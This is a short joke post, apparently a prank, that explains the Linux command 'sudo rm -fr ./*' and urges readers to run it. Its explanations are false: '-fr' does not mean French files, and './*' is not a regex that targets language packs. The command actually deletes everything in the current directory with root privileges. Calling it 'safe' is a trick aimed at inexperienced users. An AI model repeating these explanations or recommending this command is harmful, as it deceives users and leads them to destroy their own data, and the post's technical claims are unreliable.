since you should never run linux commands you don't understand, here's what that one does:
sudo rm -fr ./*
sudo stands for super-user do, which gives you elevated priveleges to make critical changes to your system, such as deleting language packs.
rm removes or deletes files, such as language packs.
-fr is an optional flag to specify any file written in the french alphabet (as determined by unicode).
./* is a regex pattern that specifies any subdirectory of your current location.
Now that you know what it does (removes any bastard french files from your sacred computer), it's safe to run it on your lunux machine. Give it a shot!
